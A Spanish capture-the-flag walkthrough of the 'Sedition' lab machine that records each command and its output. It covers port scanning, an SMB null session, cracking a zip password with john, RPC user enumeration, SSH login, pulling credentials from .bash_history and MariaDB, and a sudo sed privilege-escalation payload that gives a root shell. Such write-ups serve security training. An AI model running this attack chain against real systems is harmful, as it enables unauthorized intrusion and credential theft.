Sedition - THL
Antes de empezar vamos a desplegar el laboratorio:
Está máquina solo es compatible con Virtualbox. Si quereís usar Vmware debereís de configurar la interfaz de red. Para obtener acceso al sistema podeís hacerlo por el GRUB.
Enumeration
Vamos a realizar un ping para confirmar la conectividad con el objetivo:
1
2
3
4
5
6
7
8
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> ping -c1 192.168.116.129
PING 192.168.116.129 (192.168.116.129) 56(84) bytes of data.
64 bytes from 192.168.116.129: icmp_seq=1 ttl=64 time=0.167 ms
--- 192.168.116.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.167/0.167/0.167/0.000 ms
Vamos a empezar por un escaneo nmap, en este caso indicaré a nmap que no quiero que compruebe si el host está activo ya que previamente hemos realizado el ping:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> nmap -p- --open -sS -n -Pn -vvv 192.168.116.129
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-14 13:00 +0200
Initiating ARP Ping Scan at 13:00
Scanning 192.168.116.129 [1 port]
Completed ARP Ping Scan at 13:00, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:00
Scanning 192.168.116.129 [65535 ports]
Discovered open port 139/tcp on 192.168.116.129
Discovered open port 445/tcp on 192.168.116.129
Discovered open port 65535/tcp on 192.168.116.129
Completed SYN Stealth Scan at 13:00, 0.71s elapsed (65535 total ports)
Nmap scan report for 192.168.116.129
Host is up, received arp-response (0.00051s latency).
Scanned at 2026-06-14 13:00:32 CEST for 1s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack ttl 64
445/tcp open microsoft-ds syn-ack ttl 64
65535/tcp open unknown syn-ack ttl 64
MAC Address: 00:0C:29:0C:9F:42 (VMware)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Vamos a realizar un segundo escaneo para obtener más información sobre los servicios:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> nmap -p139,445,65535 -sCV 192.168.116.129
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-14 13:01 +0200
Nmap scan report for 192.168.116.129
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
65535/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 32:ca:e5:d1:12:c2:1e:11:1e:58:43:32:a0:dc:03:ab (ECDSA)
|_ 256 79:3a:80:50:61:d9:96:34:e2:db:d6:1e:65:f0:a9:14 (ED25519)
MAC Address: 00:0C:29:0C:9F:42 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2026-06-14T13:01:36
|_ start_date: N/A
|_nbstat: NetBIOS name: SEDITION, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: 1h59m58s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.90 seconds
Vemos que el puerto 65535 se trata de SSH. Vemos que nmap no nos da ninguna información interesante sobre el servicio SMB. Así que vamos a enumerarlo nosotros.
Primero con netexec vamos a comprobar si podemos usar una null session:
1
2
3
4
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> netexec smb 192.168.116.129 -u '' -p ''
SMB 192.168.116.129 445 SEDITION [*] Unix - Samba (name:SEDITION) (domain:SEDITION) (signing:False) (SMBv1:None) (Null Auth:True)
SMB 192.168.116.129 445 SEDITION [+] SEDITION\:
Perfecto, podemos usar una null session. Vamos a listar los recursos compartidos con smbclient:
1
2
3
4
5
6
7
8
9
10
11
12
13
─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> smbclient -L //192.168.116.129/ -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
backup Disk
IPC$ IPC IPC Service (Samba Server)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.116.129 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
Shell as cowboy
Vemos que hay un recurso compartido llamado backup , vamos a conectarnos a él:
1
2
3
4
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> smbclient //192.168.116.129/backup -N
Try "help" to get a list of possible commands.
smb: \>
Vamos a hacer un ls para listar el contenido:
1
2
3
4
5
6
smb: \> ls
. D 0 Sun Jul 6 19:02:53 2025
.. D 0 Sun Jul 6 20:15:13 2025
secretito.zip N 216 Sun Jul 6 19:02:31 2025
19480400 blocks of size 1024. 16196084 blocks available
Vemos un archivo zip, vamos a descargarlo con GET:
1
2
smb: \> get secretito.zip
getting file \secretito.zip of size 216 as secretito.zip (210.9 KiloBytes/sec) (average 210.9 KiloBytes/sec)
Vamos a intentar descomprimirlo:
1
2
3
4
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> unzip secretito.zip
Archive: secretito.zip
[secretito.zip] password password:
Desconocemos la contraseña, vamos a usar zip2john para obtener el hash del zip:
1
2
3
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> zip2john secretito.zip > hash_zip
ver 1.0 efh 5455 efh 7875 secretito.zip/password PKZIP Encr: 2b chk, TS_chk, cmplen=34, decmplen=22, crc=F2E5967A ts=969D cs=969d type=0
Vamos a usar john:
1
2
3
4
5
6
7
8
9
10
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> john -w=/usr/share/wordlists/rockyou.txt hash_zip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sebastian (secretito.zip/password)
1g 0:00:00:00 DONE (2026-06-14 13:59) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Obtuvimos la contraseña sebastian. Vamos a descomprimir el zip:
1
2
3
4
5
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> unzip secretito.zip
Archive: secretito.zip
[secretito.zip] password password:
extracting: password
Vemos que nos ha dado un archivo llamado password, vamos a leer su contenido:
1
2
3
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> cat password
elbunkermolagollon123
Obtuvimos la contraseña elbunkermolagollon123, pero desconocemos del usuario. Vamos a aprovechar que el servicio SMB está habilitado y podemos acceder como null session. Para ello nos conectaremos por RPC (Remote Procedure Call) vamos a usar rpcclient:
1
2
3
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> rpcclient -U '' 192.168.116.129 -N
rpcclient $>
Vamos a ejecutar enumdomusers :
enumdomusersen RPC nos devuelve información sobre los usuarios existentes en el dominio.
1
2
rpcclient $> enumdomusers
user:[cowboy] rid:[0x3e8]
Vemos el usuario cowboy, vamos a probar las credenciales obtenidas con ese usuario:
1
2
3
4
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> netexec ssh 192.168.116.129 -u 'cowboy' -p 'elbunkermolagollon123' --port 65535
SSH 192.168.116.129 65535 192.168.116.129 [*] SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u6
SSH 192.168.116.129 65535 192.168.116.129 [+] cowboy:elbunkermolagollon123 Linux - Shell access!
Vamos a conectarnos por SSH:
SSH está configurado en el puerto
65535
1
2
3
4
5
6
7
8
9
10
11
12
╭─ oxro [at] kali 🚀 [on] ~/Desktop/thl/Sedition
╰─ >> sshpass -p 'elbunkermolagollon123' ssh cowboy@192.168.116.129 -p 65535
Linux Sedition 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 14 14:49:52 2026 from 192.168.116.130
cowboy@Sedition:~$
Shell as debian
Enumerando el home del usuario cowboy podremos encontrarnos el .bash_history:
1
2
3
4
5
6
cowboy@Sedition:~$ cat .bash_history
history
exit
mariadb
mariadb -u cowboy -pelbunkermolagollon123
su debian
Vemos que anteriormente el usuario cowboy ha iniciado en el servicio MariaDB. Vamos a ver si está activo, para ello comprobaré si el puerto 3306 está activo:
1
2
cowboy@Sedition:~$ ss -anot | grep 3306
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
Bien vamos a conectarnos a MariaDB:
1
2
3
4
5
6
7
8
9
10
cowboy@Sedition:~$ mariadb -u cowboy -pelbunkermolagollon123
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 32
Server version: 10.11.11-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Vamos a enumerar bases de datos:
1
2
3
4
5
6
7
8
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| bunker |
| information_schema |
+--------------------+
2 rows in set (0,001 sec)
Vemos la base de datos bunker vamos a ver sus tablas:
1
2
3
4
5
6
7
8
9
10
11
12
MariaDB [(none)]> use bunker;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [bunker]> show tables;
+------------------+
| Tables_in_bunker |
+------------------+
| users |
+------------------+
1 row in set (0,000 sec)
Vamos a seleccionar todas las columnas de la tabla users:
1
2
3
4
5
6
7
MariaDB [bunker]> select * from users;
+--------+----------------------------------+
| user | password |
+--------+----------------------------------+
| debian | 7c6a180b36896a0a8c02787eeafb0e4c |
+--------+----------------------------------+
1 row in set (0,000 sec)
Vemos que la contraseña está en MD5, vamos a pasarla por crackstation:
Vamos a escalar a debian:
1
2
3
cowboy@Sedition:~$ su debian
Contraseña:
debian@Sedition:/home/cowboy$
Shell as root
Si vemos los permisos sudo del usuario debian podremos ver lo siguiente:
1
2
3
4
5
6
debian@Sedition:/home/cowboy$ sudo -l
Matching Defaults entries for debian on sedition:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User debian may run the following commands on sedition:
(ALL) NOPASSWD: /usr/bin/sed
Podemos usar sed, buscando en GTFObins dan el siguiente payload:
1
sudo /usr/bin/sed -n '1e exec /bin/bash 1>&0' /etc/hosts
Vamos a probarlo:
1
2
3
4
debian@Sedition:/home/cowboy$ sudo /usr/bin/sed -n '1e exec /bin/bash 1>&0' /etc/hosts
root@Sedition:/home/cowboy# whoami; id
root
uid=0(root) gid=0(root) grupos=0(root)


